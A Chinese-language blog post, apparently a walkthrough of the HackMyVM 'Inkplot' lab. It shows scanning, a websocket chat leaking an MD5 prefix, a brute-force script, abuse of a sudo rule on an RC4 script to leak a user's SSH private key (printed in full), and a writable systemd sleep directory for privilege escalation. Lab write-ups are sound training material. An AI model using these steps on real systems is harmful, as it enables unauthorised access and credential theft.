{"id":604,"date":"2024-04-22T15:06:26","date_gmt":"2024-04-22T07:06:26","guid":{"rendered":"http:\/\/162.14.82.114\/?p=604"},"modified":"2024-04-22T15:06:26","modified_gmt":"2024-04-22T07:06:26","slug":"hmv-_-inkplot","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/604\/04\/22\/2024\/","title":{"rendered":"hmv[-_-]Inkplot"},"content":{"rendered":"

Inkplot<\/h1>\n

\"image-20240422132002993\"<\/div>
\n
\"image-20240422132155403\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
rustscan -a 192.168.0.147 -- -A\n\nOpen 192.168.0.147:22\nOpen 192.168.0.147:3000\n\nPORT     STATE SERVICE   REASON  VERSION\n22\/tcp   open  ssh       syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n3000\/tcp open  websocket syn-ack Ogar agar.io server\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ curl http:\/\/192.168.0.147:3000                                                                                           \nUpgrade Required<\/code><\/pre>\n
\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u7aef\u53e3\uff1ahttps:\/\/book.hacktricks.xyz\/pentesting-web\/h2c-smuggling#websocket-smuggling<\/a><\/p>\n
\"image-20240422150418040\"<\/div><\/p>\n
\u6bd4\u8f83\u7b26\u5408\u6211\u4eec\u627e\u5230\u7684\u4e1c\u897f\uff0c\u6211\u4eec\u7ee7\u7eed\u641c\u96c6\u4e00\u4e0b\u4fe1\u606f\uff1a<\/p>\n
https:\/\/book.hacktricks.xyz\/pentesting-web\/websocket-attacks<\/a><\/p>\n
\"image-20240422132834482\"<\/div><\/p>\n
\u7206\u7834hash<\/h3>\n
\u5c1d\u8bd5\u4f7f\u7528\u7f16\u8bd1\u597d\u7684<\/a>\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ .\/websocat.x86_64-unknown-linux-musl ws:\/\/192.168.0.147:3000\nWelcome to our InkPlot secret IRC server\nBob: Alice, ready to knock our naive Leila off her digital pedestal?\nAlice: Bob, I've been dreaming about this for weeks. Leila has no idea what's about to hit her.\nBob: Exactly. We're gonna tear her defense system apart. She won't see it coming.\nAlice: Poor Leila, always so confident. Let's do this.\nBob: Alice, I'll need that MD5 hash to finish the job. Got it?\nAlice: Yeah, I've got it. Time to shake Leila's world.\nBob: Perfect. Release it.\nAlice: Here it goes: d51540...\n*Alice has disconnected*\nBob: What?! Damn it, Alice?! Not now!\nLeila: clear<\/code><\/pre>\n
\u610f\u601d\u5927\u6982\u662fMD5 hash<\/code>\u524d\u51e0\u4f4d\u662fd51540<\/code>\uff0c\u5c1d\u8bd5\u5199\u811a\u672c\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
#!\/bin\/bash\nflag="d51540"\n\nwhile read -r word; do\n    hash=$(echo "$word" | md5sum | cut -d " " -f 1)\n    if [[ $hash == $flag* ]]; then\n        echo "[+]I got it! PASS: $word, HASH: $hash"\n    fi\ndone < $1<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ .\/brute.sh \/usr\/share\/wordlists\/rockyou.txt\n[+]I got it! PASS: palmira, HASH: d515407c6ec25b2a61656a234ddf22bd\n[+]I got it! PASS: intelinside, HASH: d51540c4ecaa62b0509f453fee4cd66b<\/code><\/pre>\n
\u5c1d\u8bd5\u4f7f\u7528\u5176\u8fdb\u884c\u767b\u5f55\uff01<\/p>\n
leila\nintelinside<\/code><\/pre>\n
\"image-20240422135901737\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u256d\u2500leila@inkplot ~ \n\u2570\u2500$ ls -la\ntotal 48\ndrwx---r-x  5 leila leila 4096 Apr 22 07:59 .\ndrwxr-xr-x  4 root  root  4096 Jul 28  2023 ..\n-rw-r--r--  1 leila leila  220 Jul 28  2023 .bash_logout\n-rw-r--r--  1 leila leila 3526 Jul 28  2023 .bashrc\n-rw-------  1 leila leila   20 Aug  1  2023 .lesshst\ndrwxr-xr-x  3 leila leila 4096 Jul 28  2023 .local\ndrwxr-xr-x 12 leila leila 4096 Jul 28  2023 .oh-my-zsh\n-rw-r--r--  1 leila leila  807 Jul 28  2023 .profile\ndrwx------  2 leila leila 4096 Jul 28  2023 .ssh\n-rw-r--r--  1 leila leila  169 Apr 22 07:58 .wget-hsts\n-rw-------  1 leila leila   22 Apr 22 07:59 .zsh_history\n-rw-r--r--  1 leila leila 3890 Jul 28  2023 .zshrc\n\u256d\u2500leila@inkplot ~ \n\u2570\u2500$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/usr\/bin\/zsh\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\ncrom:x:1001:1001:,,,:\/home\/crom:\/bin\/zsh\npauline:x:1000:1000:,,,:\/home\/pauline:\/bin\/zsh\nwebsocat:x:103:111::\/nonexistent:\/usr\/sbin\/nologin\nleila:x:1003:1003:,,,:\/home\/leila:\/bin\/zsh\n\u256d\u2500leila@inkplot ~ \n\u2570\u2500$ cat \/etc\/shadow \ncat: \/etc\/shadow: Permission denied\n\u256d\u2500leila@inkplot ~ \n\u2570\u2500$ sudo -l                                                                                                                                         1 \u21b5\nMatching Defaults entries for leila on inkplot:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser leila may run the following commands on inkplot:\n    (pauline : pauline) NOPASSWD: \/usr\/bin\/python3 \/home\/pauline\/cipher.py*\n\ncat: \/home\/pauline\/cipher.py\/: Not a directory\n\u256d\u2500leila@inkplot ~ \n\u2570\u2500$ cat \/home\/pauline\/cipher.py                                                                                                                     1 \u21b5\nimport os\nimport json\nimport argparse\nfrom Crypto.Cipher import ARC4\nimport base64\n\nwith open('\/home\/pauline\/keys.json', 'r') as f:\n    keys = json.load(f)\n\ncrypt_key = keys['crypt_key'].encode()\n\ndef encrypt_file(filepath, key):\n    with open(filepath, 'rb') as f:\n        file_content = f.read()\n\n    cipher = ARC4.new(key)\n    encrypted_content = cipher.encrypt(file_content)\n\n    encoded_content = base64.b64encode(encrypted_content)\n\n    base_filename = os.path.basename(filepath)\n\n    with open(base_filename + '.enc', 'wb') as f:\n        f.write(encoded_content)\n\n    return base_filename + '.enc'\n\ndef decrypt_file(filepath, key):\n    with open(filepath, 'rb') as f:\n        encrypted_content = f.read()\n\n    decoded_content = base64.b64decode(encrypted_content)\n\n    cipher = ARC4.new(key)\n    decrypted_content = cipher.decrypt(decoded_content)\n\n    return decrypted_content\n\nparser = argparse.ArgumentParser(description='Encrypt or decrypt a file.')\nparser.add_argument('filepath', help='The path to the file to encrypt or decrypt.')\nparser.add_argument('-e', '--encrypt', action='store_true', help='Encrypt the file.')\nparser.add_argument('-d', '--decrypt', action='store_true', help='Decrypt the file.')\n\nargs = parser.parse_args()\n\nif args.encrypt:\n    encrypted_filepath = encrypt_file(args.filepath, crypt_key)\n    print("The encrypted and encoded content has been written to: ")\n    print(encrypted_filepath)\nelif args.decrypt:\n    decrypt_key = input("Please enter the decryption key: ").encode()\n    decrypted_content = decrypt_file(args.filepath, decrypt_key)\n    print("The decrypted content is: ")\n    print(decrypted_content)\nelse:\n    print("Please provide an operation type. Use -e to encrypt or -d to decrypt.")<\/code><\/pre>\n
\u5927\u6982\u662f\u5bf9\u6587\u672c\u8fdb\u884cRC4<\/code>\u52a0\u5bc6\u4ee5\u540e\u518d\u8fdb\u884cbase64<\/code>\u52a0\u5bc6\u7136\u540e\u5b58\u50a8\u4e3aenc<\/code>\u6587\u4ef6\uff0c\u7b2c\u4e00\u60f3\u6cd5\u662f\u52a0\u5bc6\u518d\u89e3\u5bc6\uff0c\u53ef\u60dc\u6211\u4eec\u6ca1\u6709\u5bc6\u94a5\uff0c\u542c\u5e08\u5085\u4eec\u8bf4\u6709\u4e2a\u5f88\u795e\u5947\u7684\u7279\u8d28\uff1a<\/p>\n
\"image-20240422143010178\"<\/div><\/p>\n
\u52a0\u5bc6\u4e24\u6b21\u4f1a\u590d\u539f\uff0c\u5229\u7528\u8fd9\u4e2a\u529e\u6cd5\u8fdb\u884c\u67e5\u8be2 ssh \u79c1\u94a5\uff1a<\/p>\n
\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ sudo -l\nMatching Defaults entries for leila on inkplot:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser leila may run the following commands on inkplot:\n    (pauline : pauline) NOPASSWD: \/usr\/bin\/python3 \/home\/pauline\/cipher.py*\n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ sudo -u pauline \/usr\/bin\/python3 \/home\/pauline\/cipher.py\nusage: cipher.py [-h] [-e] [-d] filepath\ncipher.py: error: the following arguments are required: filepath\n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ sudo -u pauline \/usr\/bin\/python3 \/home\/pauline\/cipher.py -e \/home\/pauline\/.ssh\/id_rsa                                                           2 \u21b5\nThe encrypted and encoded content has been written to: \nid_rsa.enc\n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ cat id_rsa.enc | base64 -d > new_id_rsa.enc\n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ sudo -u pauline \/usr\/bin\/python3 \/home\/pauline\/cipher.py -e new_id_rsa.enc           \nThe encrypted and encoded content has been written to: \nnew_id_rsa.enc.enc\n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ cat new_id_rsa.enc.enc                     \nLS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFZRUFyc3RKYXVLWThpRG9aMXN6aFdCT01PY2VyMW5zMTRPZ2FiVjR5R3VXYkxTWGova3pqQ1JFClVjTXU2MXNVWUxkM05GSzRKQWRTY1RzWkZhVmIybGw3Z3J3clNXWEVWUUwzdDRLNlRuWnpKczZiN2JrTXBKMkRqUHZBYTcKS2ltUm9SZzAybWFIS1BNWkNreEUwY0U2T29sZG1oblFZcjFPdTIyTXpFQlR6cGphbXdjUGIrd3dnTFBGdm1EeHd4NnpVdApKcWxCQW93SHVrK25zSHdDVnV3eTR1Y1VIdnh3c1F5NkQrbjVoQlc2Z1NTRXBOVWFreHJ0ZTI0a0RZN2M1TlRrY3NGakdHCk9ZbWhLL1VnVXRtUVZuMCsxUURjUkNEMk53NTZKN1lkNGQxS1ArMUJQVldSNzJhbXpGUjRWT24xVHIyWHc2d1FMRklUYW4KaFVqc2hzYXoxbnUwV1BVOXJvaXBTTnhXUVltQTdtWkUwQU9vWlBZbTFSVVMrQWRzaXNRNmQ5QkJRUmxGb29DekJXYXJCQQptNWpTdjJEWDhxMHRaTjVFeStTYkNDaUVUVnQ2ZXQ0TFdndEZwOVVQQWdhM2RUU1IwdkwyYlZxOVhOaGpOemhZK25DclBTCkhzV3doSFRnZCtiMm54WmRyTkJ1VG1zdU9tNCtKSkJLN2Fsb0QrMTVBQUFGaU4waWpDemRJb3dzQUFBQUIzTnphQzF5YzIKRUFBQUdCQUs3TFNXcmltUElnNkdkYk00VmdUakRuSHE5WjdOZURvR20xZU1ocmxteTBsNC81TTR3a1JGSERMdXRiRkdDMwpkelJTdUNRSFVuRTdHUldsVzlwWmU0SzhLMGxseEZVQzk3ZUN1azUyY3liT20rMjVES1NkZzR6N3dHdXlvcGthRVlOTnBtCmh5anpHUXBNUk5IQk9qcUpYWm9aMEdLOVRydHRqTXhBVTg2WTJwc0hEMi9zTUlDenhiNWc4Y01lczFMU2FwUVFLTUI3cFAKcDdCOEFsYnNNdUxuRkI3OGNMRU11Zy9wK1lRVnVvRWtoS1RWR3BNYTdYdHVKQTJPM09UVTVITEJZeGhqbUpvU3YxSUZMWgprRlo5UHRVQTNFUWc5amNPZWllMkhlSGRTai90UVQxVmtlOW1wc3hVZUZUcDlVNjlsOE9zRUN4U0UycDRWSTdJYkdzOVo3CnRGajFQYTZJcVVqY1ZrR0pnTzVtUk5BRHFHVDJKdFVWRXZnSGJJckVPbmZRUVVFWlJhS0Fzd1ZtcXdRSnVZMHI5ZzEvS3QKTFdUZVJNdmttd2dvaEUxYmVucmVDMW9MUmFmVkR3SUd0M1Uwa2RMeTltMWF2VnpZWXpjNFdQcHdxejBoN0ZzSVIwNEhmbQo5cDhXWGF6UWJrNXJManB1UGlTUVN1MnBhQS90ZVFBQUFBTUJBQUVBQUFHQVN4MXlOZndkMVFPZVMvaE42alhLTkVyR0RYCjM4QVZ0LzNwMk5RN2UwWTQreUNEMkQwT2d1OGVJS2Nqcm9SVzNpVExwMWhvb2MvQ3IwNnkvdUNxWGtwWGgrczZLSG5pN1IKekd0aDYrRU1PRE9XbjdDanhjUW82YmV3WjdmVEZ5ODBNblIybkRFSzV6WnRFQ3pBOFpHbG00djBYem50TVNtQW9LZFNYNQp2ZkZERkZjUzQ3cWcxMVlxRnRlclhYbitmd3VNb0lkWE0reU9wOU9pTDRrR2tkcnhPMXVtRXFmbk5sSy95VTdSVzNXZE1iCks0aW16R3ZJZllBRi8wdVRFc1dIbFdqL1hoOVpJSXdzMTk2S2VqNDVOd0M2TGo2UmhBRDNSbkpCNmVJRWVrenFIWEQ1anYKMjAwWE9KOTZ0dmUvbHdLbEUyZWdWR2xEZlhGRHkvUVU1WXpCR204VWd3NWFvWS93V0R1RG1OYjRtVDR4NUdHQ1ZocVRLWQpnOUppQlpGUHJkSFhGclp4bUpScEpLa1Azd2xMaVNYc0JQR2FMWjNxRFlVay9PeVRzNUhNREpoNTAzMFJ6Qlp5WG9kTXJ0Cjc5UXNqUEtxc1ZSL2d6YWd6Q2w3bWFTdFUzMDdrTGVFQnlDZDRmMlI0OWIwVXA3RFF2azdsdS8wMGJIdmFBVUcrL0FBQUEKd1FDcXFobDRqZ0MrMGJ2K2dIY0Z0VHZTcjFJVGdHYzVwc0ZId1diTnR3UUFHanhieUs0R3FlVTM1ckY2b2hOSXQ3dXNBQgpBQ2tiMmhSWTJVK1BQRTNNMkdzTXBQYnJXeWYwSlRnd0M4M0h3NWhFN2liUDRRWUsyeUFuNDA5elVudzZLQU4wdHVTVGJ5ClF0cmFWdXEwVEplWVUzbm9WSlVmRm1zMHgxUUFIQmN4TTlaOWsrMSt1alhsY1ppazlDM3FoRUFVZFR4aWtMeGpUT2FFaFcKVzZ5NDFrVjc4RzU0NmNnVWNqUk9CdTIxellzWTBHOHRQam9idFN6dVcrSGtva3ltb0FBQURCQVBKVUsrQ291VnlkRW1vMgpuOVJOWWI5eFg0SjBQUWdreTYwRVF4NXhxZUFMV2hIcUpYZXRtemd5QW0ycmx1R0ErNHUwZWN5eVZBN1hLMVN5TmRFTkhrClRiM05OQ3padmpmSEhyZkRtM3c3OTlQVlAzZEFocEkzSmIxa0ZkM0h5TURhRklGM3AxS3gvR2I4VXlPcWxpTGg5d09XTWEKcnV2UzRGdk9sZlc3WTl1WWtpTThaSHR4VWNZRWVqN3FUYkpmNFBNdERxRDhQODZqTE8xeVV5NTdKVTEwbnIyVTNoYllGRgpHeGdwMmNVR2cra0tsWHE5SktybGJ6YURuWkpFdzZvd0FBQU1FQXVLZS9MbmhXVGJJZ3cyOW1HUm9iZmxTaVBaUTltUTcrCmlFV1FXdzdGT1dwOGlHN09RM2J1Rk1DdnBzYWZqZTgrUEw0YlYwdUttSTZhbEsySW5xR2xON2p0K0ZZTENEdWdzbVV3aUEKQTZLcmxzRlh0UHYvQk9vNkxLNVllNk9UWUlRbklSRjVna3BVSjFGdVBTUTRkUHh3bEk3NDBPSEFpQjdCSE5nSlFoZCtFbApzWXdNQnJodXBORE5PakdJc2IydDV5Ly9PRUd3NGdpZjRGYmhEOUdxT2NnRG1Zb1hTUHhxTFVCOGRpdXBQVUdVSFVCT1NwCmFEZkFEOHloaVVtYlV6QUFBQURuQmhkV3hwYm1WQVpHVmlhV0Z1QVFJREJBPT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==%                       \n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ cat new_id_rsa.enc.enc | base64 -d\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEArstJauKY8iDoZ1szhWBOMOcer1ns14OgabV4yGuWbLSXj\/kzjCRE\nUcMu61sUYLd3NFK4JAdScTsZFaVb2ll7grwrSWXEVQL3t4K6TnZzJs6b7bkMpJ2DjPvAa7\nKimRoRg02maHKPMZCkxE0cE6OoldmhnQYr1Ou22MzEBTzpjamwcPb+wwgLPFvmDxwx6zUt\nJqlBAowHuk+nsHwCVuwy4ucUHvxwsQy6D+n5hBW6gSSEpNUakxrte24kDY7c5NTkcsFjGG\nOYmhK\/UgUtmQVn0+1QDcRCD2Nw56J7Yd4d1KP+1BPVWR72amzFR4VOn1Tr2Xw6wQLFITan\nhUjshsaz1nu0WPU9roipSNxWQYmA7mZE0AOoZPYm1RUS+AdsisQ6d9BBQRlFooCzBWarBA\nm5jSv2DX8q0tZN5Ey+SbCCiETVt6et4LWgtFp9UPAga3dTSR0vL2bVq9XNhjNzhY+nCrPS\nHsWwhHTgd+b2nxZdrNBuTmsuOm4+JJBK7aloD+15AAAFiN0ijCzdIowsAAAAB3NzaC1yc2\nEAAAGBAK7LSWrimPIg6GdbM4VgTjDnHq9Z7NeDoGm1eMhrlmy0l4\/5M4wkRFHDLutbFGC3\ndzRSuCQHUnE7GRWlW9pZe4K8K0llxFUC97eCuk52cybOm+25DKSdg4z7wGuyopkaEYNNpm\nhyjzGQpMRNHBOjqJXZoZ0GK9TrttjMxAU86Y2psHD2\/sMICzxb5g8cMes1LSapQQKMB7pP\np7B8AlbsMuLnFB78cLEMug\/p+YQVuoEkhKTVGpMa7XtuJA2O3OTU5HLBYxhjmJoSv1IFLZ\nkFZ9PtUA3EQg9jcOeie2HeHdSj\/tQT1Vke9mpsxUeFTp9U69l8OsECxSE2p4VI7IbGs9Z7\ntFj1Pa6IqUjcVkGJgO5mRNADqGT2JtUVEvgHbIrEOnfQQUEZRaKAswVmqwQJuY0r9g1\/Kt\nLWTeRMvkmwgohE1benreC1oLRafVDwIGt3U0kdLy9m1avVzYYzc4WPpwqz0h7FsIR04Hfm\n9p8WXazQbk5rLjpuPiSQSu2paA\/teQAAAAMBAAEAAAGASx1yNfwd1QOeS\/hN6jXKNErGDX\n38AVt\/3p2NQ7e0Y4+yCD2D0Ogu8eIKcjroRW3iTLp1hooc\/Cr06y\/uCqXkpXh+s6KHni7R\nzGth6+EMODOWn7CjxcQo6bewZ7fTFy80MnR2nDEK5zZtECzA8ZGlm4v0XzntMSmAoKdSX5\nvfFDFFcS47qg11YqFterXXn+fwuMoIdXM+yOp9OiL4kGkdrxO1umEqfnNlK\/yU7RW3WdMb\nK4imzGvIfYAF\/0uTEsWHlWj\/Xh9ZIIws196Kej45NwC6Lj6RhAD3RnJB6eIEekzqHXD5jv\n200XOJ96tve\/lwKlE2egVGlDfXFDy\/QU5YzBGm8Ugw5aoY\/wWDuDmNb4mT4x5GGCVhqTKY\ng9JiBZFPrdHXFrZxmJRpJKkP3wlLiSXsBPGaLZ3qDYUk\/OyTs5HMDJh5030RzBZyXodMrt\n79QsjPKqsVR\/gzagzCl7maStU307kLeEByCd4f2R49b0Up7DQvk7lu\/00bHvaAUG+\/AAAA\nwQCqqhl4jgC+0bv+gHcFtTvSr1ITgGc5psFHwWbNtwQAGjxbyK4GqeU35rF6ohNIt7usAB\nACkb2hRY2U+PPE3M2GsMpPbrWyf0JTgwC83Hw5hE7ibP4QYK2yAn409zUnw6KAN0tuSTby\nQtraVuq0TJeYU3noVJUfFms0x1QAHBcxM9Z9k+1+ujXlcZik9C3qhEAUdTxikLxjTOaEhW\nW6y41kV78G546cgUcjROBu21zYsY0G8tPjobtSzuW+HkokymoAAADBAPJUK+CouVydEmo2\nn9RNYb9xX4J0PQgky60EQx5xqeALWhHqJXetmzgyAm2rluGA+4u0ecyyVA7XK1SyNdENHk\nTb3NNCzZvjfHHrfDm3w799PVP3dAhpI3Jb1kFd3HyMDaFIF3p1Kx\/Gb8UyOqliLh9wOWMa\nruvS4FvOlfW7Y9uYkiM8ZHtxUcYEej7qTbJf4PMtDqD8P86jLO1yUy57JU10nr2U3hbYFF\nGxgp2cUGg+kKlXq9JKrlbzaDnZJEw6owAAAMEAuKe\/LnhWTbIgw29mGRobflSiPZQ9mQ7+\niEWQWw7FOWp8iG7OQ3buFMCvpsafje8+PL4bV0uKmI6alK2InqGlN7jt+FYLCDugsmUwiA\nA6KrlsFXtPv\/BOo6LK5Ye6OTYIQnIRF5gkpUJ1FuPSQ4dPxwlI740OHAiB7BHNgJQhd+El\nsYwMBrhupNDNOjGIsb2t5y\/\/OEGw4gif4FbhD9GqOcgDmYoXSPxqLUB8diupPUGUHUBOSp\naDfAD8yhiUmbUzAAAADnBhdWxpbmVAZGViaWFuAQIDBA==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
\u7136\u540e\u5229\u7528\u8fd9\u4e2a\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ vim inkplot   \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ chmod 600 inkplot                          \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ ssh pauline@192.168.0.147 -i inkplot  \nAuto-standby now activated after 2 min of inactivity\nLinux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\n[oh-my-zsh] Would you like to update? [Y\/n] Y<\/code><\/pre>\n
\u63d0\u6743\u5230\u4e86\u4e00\u4e2a\u65b0\u7528\u6237\uff01<\/p>\n
\"image-20240422144109980\"<\/div><\/p>\n
\u63d0\u6743\u81f3root<\/h3>\n
\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ ls -la\ntotal 60\ndrwx---r-x  5 pauline pauline 4096 Apr 22 08:41 .\ndrwxr-xr-x  4 root    root    4096 Jul 28  2023 ..\n-rw-r--r--  1 pauline pauline  220 Jul 22  2023 .bash_logout\n-rw-r--r--  1 pauline pauline 3526 Jul 22  2023 .bashrc\n-rw-r--r--  1 pauline pauline 1738 Aug  1  2023 cipher.py\n-rw-r-----  1 pauline pauline   44 Jul 25  2023 keys.json\n-rw-------  1 pauline pauline   20 Aug  1  2023 .lesshst\ndrwxr-xr-x  3 pauline pauline 4096 Jul 22  2023 .local\ndrwxr-xr-x 12 pauline pauline 4096 Apr 22 08:40 .oh-my-zsh\n-rw-r--r--  1 pauline pauline  807 Jul 22  2023 .profile\ndrwx------  2 pauline pauline 4096 Jul 28  2023 .ssh\n-rw-r--r--  1 pauline pauline    0 Jul 25  2023 .sudo_as_admin_successful\n-rwx------  1 pauline pauline   33 Jul 24  2023 user.txt\n-rw-r--r--  1 pauline pauline  169 Apr 22 08:40 .wget-hsts\n-rw-------  1 pauline pauline   66 Apr 22 08:41 .zsh_history\n-rw-r--r--  1 pauline pauline 3890 Jul 22  2023 .zshrc\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ cat user.txt \na2c145eb8279c2f920de6871bef794fa\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ sudo -l\n[sudo] password for pauline: \nSorry, try again.\n[sudo] password for pauline: \nsudo: 1 incorrect password attempt\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ cat .zsh_history                                                                                                                              130 \u21b5\n: 1713768084:0;sudo -l\n: 1713768093:0;clear\n: 1713768094:0;ls -la\n: 1713768097:0;cat user.txt\n: 1713768100:0;sudo -l\n: 1713768121:0;cat .zsh_history\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ cat keys.json   \n{\n    "crypt_key": "aLLtBh0BVCFSvfZ203sM"\n}\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ whoami;id     \npauline\nuid=1000(pauline) gid=1000(pauline) groups=1000(pauline),100(users),1002(admin)\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ find \/ -writable -type f 2>\/dev\/null\n.......<\/code><\/pre>\n
\u53d1\u73b0\u6211\u4eec\u5c45\u7136\u662f\u7ba1\u7406\u5458\u7ec4\u7684\uff0c\u67e5\u8be2\u4e00\u4e0b\u6211\u4eec\u53ef\u4ee5\u64cd\u4f5c\u7684\u6587\u4ef6\uff0c\u4f46\u662f\u5f53\u6211\u4e0a\u4e2a\u5395\u6240\u4ee5\u540e\u51c6\u5907\u67e5\u7684\u65f6\u5019\u53d1\u73b0\uff1a<\/p>\n
\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ \nBroadcast message from root@inkplot (Mon 2024-04-22 08:45:59 CEST):\n\nThe system will suspend now!<\/code><\/pre>\n
\u5b58\u5728\u5b9a\u65f6\u4efb\u52a1\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ nmap 192.168.0.147   \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-22 02:43 EDT\nNote: Host seems down. If it is really up, but blocking our ping probes, try -Pn\nNmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds<\/code><\/pre>\n
\u554a\u8fd9\u3002\u3002\u3002\u3002\u91cd\u542f\u9776\u673a\uff1a<\/p>\n
\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ find \/ -group admin 2>\/dev\/null\n\/usr\/lib\/systemd\/system-sleep<\/code><\/pre>\n
\n
\/usr\/lib\/systemd\/system-sleep<\/code> \u662f\u4e00\u4e2a\u5728 Linux \u7cfb\u7edf\u4e2d\u7531 systemd<\/code> \u7ba1\u7406\u7684\u7279\u6b8a\u76ee\u5f55\uff0c\u7528\u4e8e\u5b58\u653e\u5728\u7cfb\u7edf\u8fdb\u5165\u7761\u7720\u72b6\u6001\uff08\u5982\u6302\u8d77\u5230\u5185\u5b58\u6216\u78c1\u76d8\uff09\u6216\u5524\u9192\u65f6\u81ea\u52a8\u6267\u884c\u7684\u811a\u672c\u3002<\/p>\n
